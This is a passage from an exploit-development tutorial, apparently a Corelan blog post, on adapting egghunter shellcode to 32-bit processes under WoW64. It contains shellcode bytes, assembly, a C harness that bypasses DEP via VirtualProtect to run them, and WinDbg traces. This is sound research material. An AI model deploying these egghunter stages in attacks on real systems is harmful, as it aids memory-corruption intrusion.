There are 2 major objectives for an Egghunter:<\/span><\/p>\n <\/p>\n Peter wrote a great tutorial<\/a> covering Egghunter\u2019s from top to bottom. <\/span><\/p>\n Today I will particularly focus on Skape\u2019s<\/a> original Egghunter which checks an area in memory to see if it\u2019s readable by issuing a system call, returning an error code reflecting the access level of the address that was passed as one of the arguments to the system call, and then comparing the outcome in the Egghunter itself through some conditional jumps. If you are familiar (or have read Peter's tutorial), you should recognize this few lines of assembly :<\/span><\/p>\n Before issuing the interrupt call, you notice that we put 0x2 into EAX which is the desired system call number associated with NtAccessCheckAndAuditAlarm. <\/span><\/span><\/p>\n Then we use int 2e, which is a software interrupt that triggers a switch from user mode to kernel mode (to invoke syscalls). If we take a look at the system call stub, we have the option to call <\/span>NtAccessCheckAndAuditAlarm via either int 2e or sysenter. The latter may require a bit more work, but technically it would work.<\/span><\/p>\n Much has been said and done around egghunters already, and variations on egghunters (such as omelet hunters<\/a>), no need to repeat that. But in todays environments, we can ask ourselves a few questions.<\/span><\/p>\n These questions essentially are: <\/span><\/p>\n Well, the last question can be answered very easily. Increasingly more people are using 64bit of the Windows operating system. New computers usually get delivered with a 64bit version of Windows 7, but the reality is that in most cases, the majority of the applications people install and use are still 32bit versions.<\/span><\/p>\n Exploits for that environment are no different than the ones running on a 32bit version of the Windows operating system. You may have to deal with DEP in certain cases, but that is not a result of 64bit as such. Just keep in mind that these 32 bit applications run inside an additional layer called WoW64.<\/span><\/p>\n Answering the other questions requires a little bit more work.<\/span><\/p>\n <\/p>\n There is a good article on Wikipedia explaining WoW64 system<\/a> and on MSDN<\/a>. <\/span><\/p>\n From MSDN:<\/span><\/p>\n At startup, Wow64.dll loads the x86 version of Ntdll.dll and runs its initialization code, which loads all necessary 32-bit DLLs. Almost all 32-bit DLLs are unmodified copies of 32-bit Windows binaries. However, some of these DLLs are written to behave differently on WOW64 than they do on 32-bit Windows, usually because they share memory with 64-bit system components.<\/p>\n<\/blockquote>\n So to test this out I am going to use our existing Egghunter, run it inside a 32bit process on a 64bit operating system and see what the issues are going to be.<\/span><\/p>\n We can create a small program and compile it with a 32 bit compiler and run it on our 64 bit host. For this example this C program will bypass DEP using a call to VirtualProtect and run the standard 32 bit Egghunter bytes. (The DEP bypass is only needed if you have DEP enabled in OptOut or AlwaysOn mode, which is the case on my Windows 7 64bit test machine\u2026 in any case, it doesn't do any harm or change anything to the egghunter itself)<\/span><\/p>\n The 'shellcode' used is just a placeholder. It contains the double tag used for the egghunter to locate the shellcode in memory, followed by 4 simple instructions and a breakpoint.<\/span><\/p>\n In order to prevent that we are going to use the egghunter to find it, and not just slide through and execute the shellcode placed after the egghunter on the stack, we have put some breakpoints before the double tag.<\/span><\/p>\n <\/p>\n Compile the application, but don't run it yet.<\/span><\/p>\n Launch the 64bit version of Windbg, and open the newly created executable in WinDbg . <\/span><\/p>\n By the way : To install WinDbg and retrieve all the symbols <\/span>go here<\/span><\/a>. <\/span><\/p>\n If we do a dump on our loaded modules we can see the WoW64 dynamic linked libraries it uses. <\/span><\/p>\n We go ahead and set a break point at the beginning of our Egghunter bytes. <\/span><\/p>\n On my PC this address is 0x43f000. <\/span><\/p>\n Run the application, which should hit the breakpoint you just set.<\/span><\/p>\n Now, when stepping through our code, we see an access violation :<\/span><\/p>\n Lets go ahead and analyze what\u2019s going on<\/span><\/p>\n It looks like the command \u2018int 2e\u2019 is not able to be passed in our WoW64 environment. In short, this means that 'int 2e' doesn't seem to work the way it did in a purely 32bit environment. That's a bummer, because we need the syscall to determine if a page is readable before trying to read it. If we can't do that, the egghunter would die as soon as it tries to read from a non-readable memory location.<\/span><\/p>\n So how exactly are system calls processed in Wow64? There must be a way to be able to call NtAccessCheckAndAuditAlarm in the WoW64 environment? I bet you are asking yourself the same questions I just raised. <\/span><\/p>\n I decided to search Google and found some pretty handy resources: <\/span><\/p>\n On a 64 bit system running a 32 bit compiled application, we see that instead of calling a system call stub to our system calls, we appear to be calling an offset located in TEB, 0xC0 (call dword fs:[C0]).<\/span><\/p>\n If we look at TEB 0x0C we see \u201cWOW32 Reserved\u201d. If we then point to that call and execute we the see the bytes at TEB 0x0C is a jump.<\/span><\/p>\n <\/p>\n We are doing a far jump and we are going to jump into 64bit mode. <\/span><\/p>\n <\/p>\n Right. So we know the classic Egghunter is not working, but we are starting to see how system calls can be issued in a WoW64 bit environment.<\/p>\n After all, we need the system call to be able to survive access violations when the Egghunter is running.<\/p>\n Let\u2019s go ahead and make a basic Egghunter based on our call setup into wow64cpu!X86SwitchTo64BitMode:<\/p>\n This will be our skeleton Egghunter:<\/p>\n If we run that through nasm our shellcode bytes will be:<\/p>\n Right off the bat we have an issue, we have null bytes. Well, it's not a technical issue, but as null bytes are often dealbreakers in exploits, ideally we should try to prevent them.<\/p>\n We can deal with that later and lets go ahead and run this.<\/p>\n When running the new code, at first I received an access violation. I decided to ignore it and to continue tracing through.<\/p>\n The below screen shot is of a log capture in Immunity after changing the Debugging Options and under Exceptions and selecting \u2018Add last exception\u2019 to ignore.<\/p>\n Take a look at the addresses mentioned in the Immunity Log\u2026. This is not good - it looks like we are not properly reading memory in a sequential way.<\/p>\n It appears that other parameters on the stack are being passed into our call and causing our code to break when we are trying to read a valid address (more on that later).<\/p>\n Let\u2019s start off with our first exception when we run the same code through 64 bit WinDbg.<\/p>\n If we break down wow64!whNtAccessCheckAndAuditAlarm we can see what\u2019s going on:<\/p>\n In green we have instructions\/conditions that will be used to check in memory if the address is readable or not in wow64!whNtAccessCheckAndAuditAlarm.<\/p>\n Our first comparison inside wow64!whNtAccessCheckAndAuditAlarm will set EBX to 0 (EBX will also be used for the other comparisons later in the function) and then compare it to the values located in [RCX]. [RCX] will contain the address of the top of the stack frame. This is when we set EDX to ESP during our Egghunter stub when we switched to WoW64. This top stack address will contain the pointer to the address we want to validate whether it\u2019s \u201creadable\u201d or not, and to determine if our egghunter should start looking in that page of memory, or move onto the next page. This also means that [RCX + offset] will also contain other pointers picked up from the stack which we will have to deal with later since they are also evaluated in this function and used as parameters. The values at [RCX +offset] will eventually be moved into different registers, and various condition checks will be done. Since we control all these values, we can control all the conditions. <\/p>\n So recapping the first parameter read from [RCX] will be our \u201ccheck whether address exists or not\u201d, and we don\u2019t want to change this parameter. The other parameters are not needed for us to successfully execute our egghunter, and we will need to modify them before passing them to wow64!whNtAccessCheckAndAuditAlarm, more on that in a bit. <\/p>\n Let\u2019s look at our stack parameters in EDX before our far jump, and then trace where we will then setup those same parameters in wow64!whNtAccessCheckAndAuditAlarm.Then we can find out what values to put in them to influence the condition we want meet, and to eventually get to our system call.<\/p>\n Notice that EBX and RCX points to the top of our stack before doing our far jump.<\/p>\n Once we step through once more we will have loaded our two conditional registers that will be tested with EBX once it\u2019s zeroed (see in green above).<\/p>\n So what if we were able to manipulate these conditional tests since we control the parameters being passed onto the stack?<\/p>\n To do this lets just edit our second conditional test \u201ccmp edx,ebx\u201d. We will rerun the program and before our far jump we will change the data at location 0x0028ff10<\/p>\n This time our condition is true so we will jump over the blue code (see above) I highlighted before. However our third condition is not met and we receive our same error as before, but we were able to control some of the flow of execution in that function and ended up jumping from wow64!whNtAccessCheckAndAuditAlarm+0x8b to wow64!whNtAccessCheckAndAuditAlarm+0xb9.<\/p>\n Looking back at our original problem it seems will need to take care of both these stack arguments for our conditional jumps.<\/p>\n Lets try it again setting doing both those stack arguments to zero and see how that plays out.<\/p>\n So we are now moving closer and we get to Wow64ShallowThunkAllocSecurityDescriptor32TO64_FNC which is our last setup before getting to our actual system call. It looks like there is one more parameter we need to control, R10.<\/p>\n To wrap it up we need to control 3 parameters on the stack, which will be used in the system call. The simplest way is to null them out or push 0 onto the stack. While this is not the most elegant approach, it\u2019s a quick solve to our issue.<\/p>\n I'll just use the built-in debugger memory edit to change the values on the stack for now.<\/p>\n Let's go ahead and rerun everything after changing our stack parameters<\/p>\n We reached our system call! Just to confirm there are no other local variables to my computer or for our C program, I went back and manipulated the stack values and reran with non-readable addresses and it worked fine.<\/p>\n To confirm our system error in EAX is correct (and confirm we found a readable address in memory) we can do a dump and see that (on my computer) 0x8f000 (the starting address of the Egghunter on my system) is a valid area of memory.<\/p>\n At this point the routine will increase EAX by 1 until it finds an address in memory that it can not read from. To speed this up I am going to change EAX to 0x9000 since I know on my computer that address is not an existing memory block.<\/p>\n Let's go ahead and continue until wow64!whNtAccessCheckAndAuditAlarm+0x5d. This was going to be our first condition that we didn\u2019t want to change. It will do a compare with RCX which is saved ESP+0 (EDX). We made this condition false on purpose.<\/p>\n When we get to the instruction \u201cmov ecx,dword ptr [rcx]\u201d, the \"address to check\" (0x9000 in this example) is read into ECX. The next instruction \u201cmov eax,dword ptr [rcx+4]\u201d will try and move the next 4 bytes (0x9004) into EAX. This is where an exception will occur, since this is not a valid memory area.<\/p>\n We can see that it tried to read from an invalid pointer, and threw an exception. If we pass the exception we will come out of WoW64 and return at our \u201ccmp al,05\u201d (break point needs to be set).<\/p>\n So, as you can see, the exception wasn't harmful to our code and we simply return from WoW64 into our 32bit process, without breaking the 32bit process.<\/p>\n If we look at our registers we can see that AL in EAX has the error code of 0x05, indicating a not readable. This condition will make our compare true, trigger a jump back to \u201cOR DX,0FFF\u201d and move to the next page in memory.<\/p>\n So it appears our Egghunter works and we are leveraging the conditional statements in wow64!whNtAccessCheckAndAuditAlarm to see if our area is readable. Let\u2019s go ahead and set EDX to 0x400000 and see if we find our shell code.<\/p>\n\n
6681CAFF0F or dx,0x0fff ; get last address in page\n42 inc edx ; acts as a counter\n ;(increments the value in EDX)\n52 push edx ; pushes edx value to the stack\n ;(saves our current address on the stack)\n6A43 push byte +0x2 ; push 0x2 for NtAccessCheckAndAuditAlarm\n ; or 0x43 for NtDisplayString to stack\n58 pop eax ; pop 0x2 or 0x43 into eax\n ; so it can be used as parameter\n ; to syscall - see next\nCD2E int 0x2e ; tell the kernel i want a do a\n ; syscall using previous register\n3C05 cmp al,0x5 ; check if access violation occurs\n ;(0xc0000005== ACCESS_VIOLATION) 5\n5A pop edx ; restore edx\n74EF je xxxx ; jmp back to start dx 0x0fffff\nB890509050 mov eax,0x50905090 ; this is the tag (egg)\n8BFA mov edi,edx ; set edi to our pointer\nAF scasd ; compare for status\n75EA jnz xxxxxx ; (back to inc edx) check egg found or not\nAF scasd ; when egg has been found\n75E7 jnz xxxxx ; (jump back to \"inc edx\")\n ; if only the first egg was found\nFFE7 jmp edi\n<\/pre>\n
![\"morepics14\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2011\/11\/morepics14_thumb1.png\")
<\/a><\/p>\n\n
Research Time!<\/span><\/h4>\n
\n
#include <cstdlib>\n#include <iostream>\n#include <windows.h>\n\nusing<\/span> namespace<\/span> std;\n\nchar<\/span> code[]=\n\n\/\/32 bit tradional egghunter <\/span>\n\"\\x66\\x81\\xCA\\xFF\\x0F\\x42\\x52\\x6A\\x02\\x58\\xCD\\x2E\\x3C\\x05\\x5A\\x74\\xEF\\xB8<\/span>\"\n\"\\x77\\x30\\x30\\x74<\/span>\" \/\/w00t <\/span>\n\"\\x8B\\xFA\\xAF\\x75\\xEA\\xAF\\x75\\xE7\\xFF\\xE7<\/span>\"\n\n\/\/SC PAYLOAD <\/span>\n\"\\xcc\\xcc\\xcc\\xcc\\x77\\x30\\x30\\x74<\/span>\"\n\"\\x77\\x30\\x30\\x74\\x41\\x42\\x43\\x44\\xcc<\/span>\"; \n\nint<\/span> main(int<\/span> argc, char<\/span> **argv)\n{\n DWORD old;\n VirtualProtect(&code, 500, PAGE_EXECUTE_READWRITE, &old);\n int<\/span> (*func)();\n func = (int<\/span> (*)()) code;\n (int<\/span>)(*func)();\n}<\/pre>\nModLoad: 00000000`00400000 00000000`00449000 image00000000`00400000\nModLoad: 00000000`77910000 00000000`77ab9000 ntdll.dll\nModLoad: 00000000`77af0000 00000000`77c70000 ntdll32.dll\nModLoad: 00000000`75130000 00000000`7516f000 C:\\Windows\\SYSTEM32\\wow64.dll\nModLoad: 00000000`750d0000 00000000`7512c000 C:\\Windows\\SYSTEM32\\wow64win.dll\nModLoad: 00000000`750c0000 00000000`750c8000 C:\\Windows\\SYSTEM32\\wow64cpu.dll\n0:000> g\nModLoad: 00000000`77440000 00000000`7755f000 WOW64_IMAGE_SECTION\nModLoad: 00000000`766e0000 00000000`767f0000 WOW64_IMAGE_SECTION\nModLoad: 00000000`77440000 00000000`7755f000 NOT_AN_IMAGE\nModLoad: 00000000`776b0000 00000000`777aa000 NOT_AN_IMAGE\nModLoad: 00000000`766e0000 00000000`767f0000 C:\\Windows\\syswow64\\kernel32.dll\nModLoad: 00000000`77080000 00000000`770c6000 C:\\Windows\\syswow64\\KERNELBASE.dll\nModLoad: 00000000`73d20000 00000000`73d54000 C:\\Program Files\\AVAST Software\\Avast\\snxhk.dll\nModLoad: 00000000`768c0000 00000000`7696c000 C:\\Windows\\syswow64\\msvcrt.dll\n0:000:x86> lm\nstart end module name\n00400000 00449000 image00000000_00400000 (deferred)\n73d20000 73d54000 snxhk (deferred)\n750c0000 750c8000 wow64cpu (deferred)\n750d0000 7512c000 wow64win (deferred)\n75130000 7516f000 wow64 (deferred)\n766e0000 767f0000 kernel32 (deferred)\n768c0000 7696c000 msvcrt (deferred)\n77080000 770c6000 KERNELBASE (deferred)\n77910000 77ab9000 ntdll (export symbols) C:\\Windows\\SYSTEM32\\ntdll.dll\n77af0000 77c70000 ntdll32 (export symbols) ntdll32.dll<\/pre>\n
![\"win2\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2011\/11\/win2_thumb1.png\")
<\/a><\/p>\n![\"win3\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2011\/11\/win3_thumb.png\")
<\/a><\/p>\n\n
![\"morepics23\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2011\/11\/morepics23_thumb1.png\")
<\/a><\/p>\n![\"morepics2\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2011\/11\/morepics3_thumb.png\")
<\/a><\/p>\n0:000:x86> u wow64cpu!X86SwitchTo64BitMode\nwow64cpu!X86SwitchTo64BitMode:\n74952320 ea1e2795743300 jmp 0033:7495271E<\/pre>\n
<\/pre>\n
Time to create a new Egghunter<\/h3>\n
0:000:x86> u ntdll32!NtAccessCheckAndAuditAlarm\nntdll32!NtAccessCheckAndAuditAlarm:\n7715fc58 b826000000 mov eax,26h\n7715fc5d 33c9 xor ecx,ecx\n7715fc5f 8d542404 lea edx,[esp+4]\n7715fc63 64ff15c0000000 call dword ptr fs:[0C0h]\n7715fc6a 83c404 add esp,4\n7715fc6d c22c00 ret 2Ch<\/pre>\n
[BITS 32]\n\negg: \n\n OR DX,0x0FFF\n INC EDX\n PUSH EDX\n PUSH BYTE 38 ;NtAccessCheckAndAuditAlarm\n POP EAX\n XOR ECX,ECX\n MOV EDX,ESP ;begin reading parameters off the stack\n CALL DWORD [FS:0xc0]\n POP ESI ;clear call off stack\n POP EDX ;pop search value back into edx\n CMP AL,5\n JE egg\n MOV EAX, 0x74303077\n MOV EDI,EDX\n SCASD\n JNZ egg + 5\n SCASD\n JNZ egg + 5\n JMP EDI<\/pre>\n
\\x66\\x81\\xCA\\xFF\\x0F\\x42\\x52\\x6A\\x26\\x58\\x31\\xC9\\x89\\xE2\n\\x64\\xFF\\x15\\xC0\\x00\\x00\\x00\\x5E\\x5A\\x3C\\x05\\x74\\xE5\\xB8\n\\x77\\x30\\x30\\x74\\x89\\xD7\\xAF\\x75\\xE0\\xAF\\x75\\xDD\\xFF\\xE7<\/pre>\n
![\"immunity13\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2011\/11\/immunity13_thumb1.png\")
<\/a><\/p>\nwow64!whNtAccessCheckAndAuditAlarm+0xc9:\n00000000`75145d71 418b4004 mov eax,dword ptr [r8+4] ds:00000000`000001f8=????????<\/pre>\n
wow64!whNtAccessCheckAndAuditAlarm:\n00000000`75145ca8 4c8bdc mov r11,rsp\n00000000`75145cab 49895b10 mov qword ptr [r11+10h],rbx\n00000000`75145caf 49897318 mov qword ptr [r11+18h],rsi\n00000000`75145cb3 57 push rdi\n00000000`75145cb4 4154 push r12\n00000000`75145cb6 4155 push r13\n00000000`75145cb8 4156 push r14\n00000000`75145cba 4157 push r15\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0x14:\n00000000`75145cbc 4881ecb0000000 sub rsp,0B0h\n00000000`75145cc3 488b0536340200 mov rax,qword ptr [wow64!_security_cookie (00000000`75169100)]\n00000000`75145cca 4833c4 xor rax,rsp\n00000000`75145ccd 48898424a0000000 mov qword ptr [rsp+0A0h],rax\n00000000`75145cd5 448b4904 mov r9d,dword ptr [rcx+4]\n00000000`75145cd9 8b5108 mov edx,dword ptr [rcx+8]\n00000000`75145cdc 448b410c mov r8d,dword ptr [rcx+0Ch]\n00000000`75145ce0 448b5110 mov r10d,dword ptr [rcx+10h]\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0x3c:\n00000000`75145ce4 448b6914 mov r13d,dword ptr [rcx+14h]\n00000000`75145ce8 448b7118 mov r14d,dword ptr [rcx+18h]\n00000000`75145cec 448a791c mov r15b,byte ptr [rcx+1Ch]\n00000000`75145cf0 8b4120 mov eax,dword ptr [rcx+20h]\n00000000`75145cf3 89442468 mov dword ptr [rsp+68h],eax\n00000000`75145cf7 8b4124 mov eax,dword ptr [rcx+24h]\n00000000`75145cfa 89442464 mov dword ptr [rsp+64h],eax\n00000000`75145cfe 8b4128 mov eax,dword ptr [rcx+28h]\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0x59:\n00000000`75145d01 89442460 mov dword ptr [rsp+60h],eax\n00000000`75145d05 33db xor ebx,ebx<\/span>\n00000000`75145d07 3919 cmp dword ptr [rcx],ebx<\/span>\n00000000`75145d09 7420 je wow64!whNtAccessCheckAndAuditAlarm+0x83 (00000000`75145d2b)<\/span>\n00000000`75145d0b 498d7398 lea rsi,[r11-68h]\n00000000`75145d0f 8b09 mov ecx,dword ptr [rcx]\n00000000`75145d11 8b4104 mov eax,dword ptr [rcx+4]\n00000000`75145d14 498943a0 mov qword ptr [r11-60h],rax\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0x70:\n00000000`75145d18 0fb74102 movzx eax,word ptr [rcx+2]\n00000000`75145d1c 6689442472 mov word ptr [rsp+72h],ax\n00000000`75145d21 0fb701 movzx eax,word ptr [rcx]\n00000000`75145d24 6689442470 mov word ptr [rsp+70h],ax\n00000000`75145d29 eb03 jmp wow64!whNtAccessCheckAndAuditAlarm+0x86 (00000000`75145d2e)\n00000000`75145d2b 488bf3 mov rsi,rbx\n00000000`75145d2e 4d8be1 mov r12,r9\n00000000`75145d31 3bd3 cmp edx,ebx<\/span>\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0x8b:\n00000000`75145d33 742c je wow64!whNtAccessCheckAndAuditAlarm+0xb9 (00000000`75145d61)<\/span>\n00000000`75145d35 488dbc2480000000lea rdi,[rsp+80h]<\/span>\n00000000`75145d3d 8b4204 mov eax,dword ptr [rdx+4]<\/span>\n00000000`75145d40 4889842488000000mov qword ptr [rsp+88h],rax<\/span>\n00000000`75145d48 0fb74202 movzx eax,word ptr [rdx+2]<\/span>\n00000000`75145d4c 6689842482000000mov word ptr [rsp+82h],ax<\/span>\n00000000`75145d54 0fb702 movzx eax,word ptr [rdx]<\/span>\n00000000`75145d57 6689842480000000mov word ptr [rsp+80h],ax<\/span>\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0xb7:\n00000000`75145d5f eb03 jmp wow64!whNtAccessCheckAndAuditAlarm+0xbc (00000000`75145d64)<\/span>\n00000000`75145d61 488bfb mov rdi,rbx\n00000000`75145d64 443bc3 cmp r8d,ebx<\/span>\n00000000`75145d67 742d je wow64!whNtAccessCheckAndAuditAlarm+0xee (00000000`75145d96)<\/span>\n00000000`75145d69 488d9c2490000000 lea rbx,[rsp+90h]\n00000000`75145d71 418b4004 mov eax,dword ptr [r8+4]<\/span>\n00000000`75145d75 4889842498000000 mov qword ptr [rsp+98h],rax\n00000000`75145d7d 410fb74002 movzx eax,word ptr [r8+2]\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0xda:\n00000000`75145d82 6689842492000000 mov word ptr [rsp+92h],ax\n00000000`75145d8a 410fb700 movzx eax,word ptr [r8]\n00000000`75145d8e 6689842490000000 mov word ptr [rsp+90h],ax\n00000000`75145d96 498bca mov rcx,r10\n00000000`75145d99 e87251ffff call wow64!Wow64ShallowThunkAllocSecurityDescriptor32TO64_FNC (00000000`7513af10)\n00000000`75145d9e 488bd0 mov rdx,rax\n00000000`75145da1 8b442468 mov eax,dword ptr [rsp+68h]\n00000000`75145da5 448b5c2464 mov r11d,dword ptr [rsp+64h]<\/pre>\n0:000:x86> r\neax=00000026 ebx=00004000 ecx=00000000 edx=0028ff08 esi=00000000 edi=00000000\neip=0043f00e esp=0028ff08 ebp=0028ff48 iopl=0 nv up ei pl zr na pe nc\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246\nimage00000000_00400000+0x3f00e:\n0043f00e 64ff15c0000000 call dword ptr fs:[0C0h] fs:0053:000000c0=00000000\n0:000:x86> dds esp\n0028ff08 0008f000\n0028ff0c 004013ec image00000000_00400000+0x13ec\n0028ff10 0043f000 image00000000_00400000+0x3f000\n0028ff14 000001f4\n0028ff18 00000040\n0028ff1c 0028ff44\n0:000:x86> g wow64!whNtAccessCheckAndAuditAlarm+0x31\nwow64!whNtAccessCheckAndAuditAlarm+0x31:\n00000000`75145cd9 8b5108 mov edx,dword ptr [rcx+8] ds:00000000`0028ff10=0043f000<\/span>\n0:000> t\nwow64!whNtAccessCheckAndAuditAlarm+0x34:\n00000000`75145cdc 448b410c mov r8d,dword ptr [rcx+0Ch] ds:00000000`0028ff14=000001f4<\/span><\/pre>\n0:000> t\nwow64!whNtAccessCheckAndAuditAlarm+0x38:\n00000000`75145ce0 448b5110 mov r10d,dword ptr [rcx+10h] ds:00000000`0028ff18=00000040\n0:000> r\nrax=000000007459d16e rbx=000000000028ff08 rcx=000000000028ff08\nrdx=000000000043f000<\/span> rsi=000000007efdb000 rdi=000000007efdd000\nrip=0000000075145ce0 rsp=000000000008e270 rbp=000000000028ff48\nr8=00000000000001f4<\/span> r9=00000000004013ec r10=000000007516aa00\nr11=000000000008e348 r12=0000000075145ca8 r13=000000000008fd20\nr14=000000000008ec80 r15=00000000750c2450\niopl=0 nv up ei pl nz na pe nc\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202\nwow64!whNtAccessCheckAndAuditAlarm+0x38:\n00000000`75145ce0 448b5110 mov r10d,dword ptr [rcx+10h] ds:00000000`0028ff18=00000040\n0:000> dds rcx\n00000000`0028ff08 0008f000\n00000000`0028ff0c 004013ec image00000000_00400000+0x13ec\n00000000`0028ff10 0043f000 image00000000_00400000+0x3f000\n00000000`0028ff14 000001f4\n00000000`0028ff18 00000040\n00000000`0028ff1c 0028ff44<\/pre>\n0:000:x86> g 0043f00e\nimage00000000_00400000+0x3f00e:\n0043f00e 64ff15c0000000 call dword ptr fs:[0C0h] fs:0053:000000c0=00000000\n0:000:x86> ed 0028ff10 00000000\n0:000:x86> dds esp\n0028ff08 0008f000\n0028ff0c 004013ec image00000000_00400000+0x13ec\n0028ff10 00000000\n0028ff14 000001f4\n0028ff18 00000040\n0028ff1c 0028ff44\n0:000:x86> g wow64!whNtAccessCheckAndAuditAlarm+0x89\nwow64!whNtAccessCheckAndAuditAlarm+0x89:\n00000000`75145d31 3bd3 cmp edx,ebx\n0:000> t\nwow64!whNtAccessCheckAndAuditAlarm+0x8b:\n00000000`75145d33 742c je wow64!whNtAccessCheckAndAuditAlarm+0xb9 (00000000`75145d61) [br=1]<\/pre>\n
wow64!whNtAccessCheckAndAuditAlarm+0x8b:\n00000000`75435d33 742c je wow64!whNtAccessCheckAndAuditAlarm+0xb9 (00000000`75435d61) [br=1]\n0:000> t\nwow64!whNtAccessCheckAndAuditAlarm+0xb9:\n00000000`75435d61 488bfb mov rdi,rbx\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0xbc:\n00000000`75435d64 443bc3 cmp r8d,ebx\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0xbf:\n00000000`75435d67 742d je wow64!whNtAccessCheckAndAuditAlarm+0xee (00000000`75435d96) [br=0]\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0xc1:\n00000000`75435d69 488d9c2490000000 lea rbx,[rsp+90h]\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0xc9:\n00000000`75435d71 418b4004 mov eax,dword ptr [r8+4] ds:00000000`000001f8=????????\n0:000>\n(1218.130c): Access violation - code c0000005 (first chance)\nFirst chance exceptions are reported before any exception handling.\nThis exception may be expected and handled<\/pre>\n
00000000`75435cd9 8b5108 mov edx,dword ptr [rcx+8]\n00000000`75435cdc 448b410c mov r8d,dword ptr [rcx+0Ch]<\/pre>\n
0:000:x86> t\nimage00000000_00400000+0x3f00e:\n0043f00e 64ff15c0000000 call dword ptr fs:[0C0h] fs:0053:000000c0=00000000\n0:000:x86> ed 0028ff10 00000000\n0:000:x86> ed 0028ff14 00000000\n0:000:x86> g wow64!whNtAccessCheckAndAuditAlarm+0x89\nwow64!whNtAccessCheckAndAuditAlarm+0x89:\n00000000`75145d31 3bd3 cmp edx,ebx\n0:000> t\nwow64!whNtAccessCheckAndAuditAlarm+0x8b:\n00000000`75145d33 742c je wow64!whNtAccessCheckAndAuditAlarm+0xb9 (00000000`75145d61) [br=1]\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0xb9:\n00000000`75145d61 488bfb mov rdi,rbx\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0xbc:\n00000000`75145d64 443bc3 cmp r8d,ebx\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0xbf:\n00000000`75145d67 742d je wow64!whNtAccessCheckAndAuditAlarm+0xee (00000000`75145d96) [br=1]\n0:000> t\nwow64!whNtAccessCheckAndAuditAlarm+0xee:\n00000000`75145d96 498bca mov rcx,r10<\/span>\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0xf1:\n00000000`75145d99 e87251ffff call wow64!Wow64ShallowThunkAllocSecurityDescriptor32TO64_FNC (00000000`7513af10)\n0:000>\nwow64!Wow64ShallowThunkAllocSecurityDescriptor32TO64_FNC:\n00000000`7513af10 4053 push rbx\n0:000>\nwow64!Wow64ShallowThunkAllocSecurityDescriptor32TO64_FNC+0x2:\n00000000`7513af12 4883ec20 sub rsp,20h\n0:000>\nwow64!Wow64ShallowThunkAllocSecurityDescriptor32TO64_FNC+0x6:\n00000000`7513af16 488bd9 mov rbx,rcx\n0:000>\nwow64!Wow64ShallowThunkAllocSecurityDescriptor32TO64_FNC+0x9:\n00000000`7513af19 4885c9 test rcx,rcx<\/span>\n0:000>\nwow64!Wow64ShallowThunkAllocSecurityDescriptor32TO64_FNC+0xc:\n00000000`7513af1c 7507 jne wow64!Wow64ShallowThunkAllocSecurityDescriptor32TO64_FNC+0x15 (00000000`7513af25) [br=1]<\/span>\n0:000>\nwow64!Wow64ShallowThunkAllocSecurityDescriptor32TO64_FNC+0x15:\n00000000`7513af25 b800800000 mov eax,8000h\n0:000>\nwow64!Wow64ShallowThunkAllocSecurityDescriptor32TO64_FNC+0x1a:\n00000000`7513af2a 66854102 test word ptr [rcx+2],ax ds:00000000`00000042=????<\/pre>\n0028ff08 0008f000 (our parameter we want to read if the address is readable or not)\n0028ff0c 004013ec R9,(doesn\u2019t appear to be affected whether readable or non-readable address is used, easier to push null to setup other params below)\n0028ff10 0043f000 EDX,(if null condition will be true with EBX)\n0028ff14 000001f4 R8, (if null condition will be true with EBX)\n0028ff18 00000040 R10,(if null condition will be false on test rcx,rcx)\n\n0:000:x86> ed 0028ff0c 00000000\n0:000:x86> ed 0028ff10 00000000\n0:000:x86> ed 0028ff14 00000000\n0:000:x86> ed 0028ff18 00000000\n0:000:x86> dds esp\n0028ff08 0008f000\n0028ff0c 00000000\n0028ff10 00000000\n0028ff14 00000000\n0028ff18 00000000\nwow64!whNtAccessCheckAndAuditAlarm+0x2d:\n00000000`74965cd5 448b4904 mov r9d,dword ptr [rcx+4] ds:00000000`0028ff0c=00000000\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0x31:\n00000000`74965cd9 8b5108 mov edx,dword ptr [rcx+8] ds:00000000`0028ff10=00000000\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0x34:\n00000000`74965cdc 448b410c mov r8d,dword ptr [rcx+0Ch] ds:00000000`0028ff14=00000000\n0:000>\nwow64!whNtAccessCheckAndAuditAlarm+0x38:\n00000000`74965ce0 448b5110 mov r10d,dword ptr [rcx+10h] ds:00000000`0028ff18=00000000<\/pre>\n
